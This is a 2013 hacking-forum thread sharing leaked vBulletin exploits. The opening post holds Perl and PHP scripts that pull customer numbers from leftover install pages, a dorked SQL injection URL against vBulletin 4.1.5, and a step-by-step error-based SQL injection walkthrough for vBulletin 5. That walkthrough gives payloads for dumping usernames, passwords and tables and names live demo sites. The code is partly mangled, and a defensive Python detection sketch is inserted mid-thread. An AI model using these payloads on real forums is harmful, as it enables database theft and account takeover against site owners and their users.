all 0day 2013 vbulletin leaked -_- fuck script kiddies

09-08-2013, 08:44 PM #1
CrashBandicot Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:104 Threads:15 Joined:Jul 2013 Reputation: 4
Mood: Zombie
vBulletin x.x.x Customer Area 0day


Perl script got leaked, so decided to post the perl script here

Code:
#!/usr/bin/perl

use LWP::UserAgent;
use 
HTTP::Request::Common;


system('cls');
system('title vBulletin Install Auto Exploiter');
print 
"\n ---------------------------------------";
print 
"\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print 
" ---------------------------------------\n";
print 
" + d4tabase.com -+- d4tabase.com + ";
print 
"\n ---------------------------------------\n";
print 
" coded by n0tch shoutz d4tabase crew ";
print 
"\n ---------------------------------------\n";


if($
#ARGV == -1 or $#ARGV > 0)
{
print 
"\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}


$domain $ARGV[0];
$install_dir "install";
$full_domain "http://$domain/$install_dir/upgrade.php";
chop($domain);


&
search;




sub search
{
$url $full_domain;
$lwp LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
$request $lwp->post($url, ["searchHash" => "Search"]);


print 
" Searching $domain ----\n ";
if (
$request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "
Result : $1\n";
} else {
print "
HashHash not found!\n";
}
}






php exploit -
--------------------


<!--?php
set_time_limit(0);


if(
$argc < 2) {
    echo "
Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL;
    
exit;
}


$URL $argv[1];
$arr parse_url($URL);


### work with url
if(strpos($URL'?')) die("Ohh, your URL is not valid");
if(
substr($URL, -11) != '/'$URL $URL '/';
if(!
$arr['scheme']) $URL 'http://' $URL;


$headers get_headers($URL '/install/upgrade.php');
if(
substr($headers[0], 93) == '200') {
    
$source file_get_contents($URL "/install/upgrade.php");
}
elseif(
$headers get_headers($URL '/install/finalupgrage.php')) {
    if(
substr($headers[0], 93) == '200'$source file_get_contents($URL "/install/finalupgrage.php");
}
else die(
"something went wrong...");


preg_match_all('|var CUSTNUMBER = "(.*?)";|'$source$res);
foreach (
$res[1] as $hash) {
    echo 
"Hash: " $hash PHP_EOL;
    
$fp fopen("hash.txt""a+");
    
fwrite($fp$hash PHP_EOL);
}
?>



vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit


Created by: Boxhead
Found on: 08/22/2013
Website: http://belegit.net
Example: http://test.com/forum/install/upgrade.php

[Form fields: Website, Customer ID, Username, Password, Email]

vbulletin 4.1.5 attachment SQLI



Examining variables, came across an sql-injection, as later found to be inherent to all vbulletin 4.1.5

Title: Vulnerability in vBulletin 4.1.5
Dork: Powered by vBulletin 4.1.5
Conditions: The account on the forum. Permission to attach files to messages / themes (attachments)

Register -> go to the forum -> click a topic or if the board is you can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage Attachments' -> Open the window and setting "values[f]" insert our SQL query. Example:

Code:
http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
After that, we see the standard error of the database offline, thus opening the source code of the page and see:


Code:
<!-- -  
Database error in vBulletin 4.1.5 :  

Invalid SQL :  

             
SELECT  
                 permissionsfrom 
,  Hidden ,  setpublish ,  publishdate ,  userid 
             FROM ds23fSDdfsdf_cms_node  
             WHERE  
                 nodeid  
= - 1599  or ( ) = ( Select from Select name_const version () , ), name_const version (), )) );  

MySQL Error    :  Duplicate column Name  .1.49-'5 '  
Error Number   :  1060  
Request Date   
:  Tuesday ,  February 12th  2013   @  01 12 33 PM  
Error Date     
:  Tuesday ,  February 12th  2013   @  01 12 33  


Address     
:  127.0.0.1  
Username       
:  Hacker  
Classname      
:  vB_Database  
MySQL Version  
:   
-> 


vbulletin 5 sql injection

vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day

************************************************** ****************
#Title: vBulletin 5 SQL Injection > Beta Whatever
#Author: 0x0A
#Date: Dec 11, 2012
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: http://www.vbulletin.com/purchases/
http://www.vbulletin.com/features/
#Homepage: hackyard.net
***********.com
#Version: 5 and above(not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Demo sites to try: http://www.sultantheme.com/vb5connectforum/
http://vb5connect.com/bb/
************************************************** ****************



-------------------------------------------------------------------
-------------------------------------------------------------------
How to
-------------------------------------------------------------------
-------------------------------------------------------------------


-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#1] First of all, make an account to the vBulletin 5 forum,

http://img402.imageshack.us/img402/7784/69376730.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------



-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)

http://imageshack.us/a/img12/305/89268702.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------


-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#3] After that click the Like button, you will receive almost the same result as me. Go to the first POST record as the picture below and click Replay button,

http://imageshack.us/a/img707/9990/68621087.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------


-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#4] Then, on Send POST Content use this:

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
-------------------------------------------------------------------------------------------------------------------------------------------------------------------

http://imageshack.us/a/img42/1590/26447606.png

//Note that to keep the noteid value as it was as default in the POST Content. Instead you'll get invalid noteid error.
The following SQLi command will fetch out the first record from user table(username/password).
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------




-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#Other SQLi Syntaxes]

+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Version():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| User():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Database():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+


+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Database Print:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7eFROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Table Count:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7eFROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Print Tables:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7eFROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Columns of selected table:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7eFROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Fetch Out Data:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7eFROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+

-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------




----------------------------------------------------

==[ That's it!
==[ Thanks, 0x0A!
==[ Romania

---------------------------------------------------- 


http://pastebin.com/5hgWHFbj
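
Added here for defenders, not part of the original post or of vBulletin: a triage sketch that flags the three request shapes this thread describes (requests to scripts under a leftover `/install/` directory, SQL in `values[f]` on `newattachment.php`, and a non-numeric `nodeid` in a POST body). The function names, the `forum.example` host, the `/placeholder-like-endpoint` path and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Any PHP script under /install/. On a production board this directory
# should already have been deleted, so every hit deserves a look.
INSTALL_RE = re.compile(r"/install/[^/]+\.php$", re.I)

# Fragments characteristic of the error-based MySQL payloads quoted in the thread.
SQLI_RE = re.compile(r"name_const\s*\(|information_schema|floor\s*\(\s*rand\s*\(", re.I)

# Parameters the thread injects into; both are meant to carry plain integers.
INT_PARAMS = {"nodeid", "values[f]"}


def triage(method, url, body=""):
    """Return a list of finding labels for one decoded HTTP request."""
    findings = []
    parts = urlsplit(url)
    if INSTALL_RE.search(parts.path):
        findings.append("install-script-access")
    params = parse_qsl(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        params += parse_qsl(body, keep_blank_values=True)
    for name, value in params:
        # Strict allow-list check: an ID parameter that is not an integer is
        # suspicious on its own, whatever the payload looks like.
        if name.lower() in INT_PARAMS and not re.fullmatch(r"-?\d+", value.strip()):
            findings.append(f"non-integer:{name}")
        if SQLI_RE.search(value):
            findings.append(f"sqli-pattern:{name}")
    return findings


# Constructed sample requests (not captured traffic); payloads are truncated.
SAMPLES = [
    ("GET", "http://forum.example/install/upgrade.php", ""),
    ("GET", "http://forum.example/newattachment.php?do=assetmanager"
            "&values[f]=-1599+or(1,2)=(select+name_const(version(),1))&contenttypeid=18", ""),
    ("POST", "http://forum.example/placeholder-like-endpoint",
             "nodeid=70)+and(select+1+from+information_schema.tables)"),
    ("POST", "http://forum.example/placeholder-like-endpoint", "nodeid=70"),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, urlsplit(url).path, triage(method, url, body))
```

The same integer check belongs in the application itself: casting `nodeid` and `values[f]` to integers before they reach a query, and deleting the `/install/` directory after setup, removes what these requests depend on.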

09-08-2013, 09:44 PM #2
Federal Offline Junior Member **
Registered
Posts:16 Threads:1 Joined:Feb 2013 Reputation: 0
Mood: None
Nice wink

09-08-2013, 09:48 PM #3
IsLam4ever Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:58 Threads:11 Joined:Aug 2013 Reputation: 0
Mood: None
thxx bro ..

09-08-2013, 11:11 PM #4
AZ Sn1ff3r (PCP) Offline Mad Lover of Security ******
V.I.P
Posts:461 Threads:46 Joined:Mar 2013 Reputation: 0
Mood: Mad
nice Biggrinsmiley Biggrinsmiley Biggrinsmiley Biggrinsmiley

09-09-2013, 12:09 AM #5
CrashBandicot Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:104 Threads:15 Joined:Jul 2013 Reputation: 4
Mood: Zombie
(09-08-2013, 09:44 PM)Federal Wrote:  
Nice wink
thnkx ab souini ket user 0day upgrade taya ma3 dz27

09-09-2013, 02:41 AM #6
x00x Offline Member ***
Registered
Posts:243 Threads:23 Joined:May 2013 Reputation: 0
Mood: None
Nice share..


09-09-2013, 06:12 AM #7
CrashBandicot Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:104 Threads:15 Joined:Jul 2013 Reputation: 4
Mood: Zombie
thnkx

09-09-2013, 07:05 AM #8
Huey Offline 'Surgeon of Death' ******
V.I.P
Posts:816 Threads:125 Joined:Apr 2013 Reputation: 5
Mood: Horny
this is awesome man, thanks Biggrinsmiley


09-09-2013, 01:53 PM #9
Waledac Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:14 Threads:0 Joined:Mar 2013 Reputation: 0
Mood: None
awesome share Biggrinsmiley wink

09-09-2013, 06:03 PM #10
rox.root12 Offline Member ***
Registered
Posts:117 Threads:22 Joined:Aug 2012 Reputation: 0
Mood: Alone
Thanks For Share
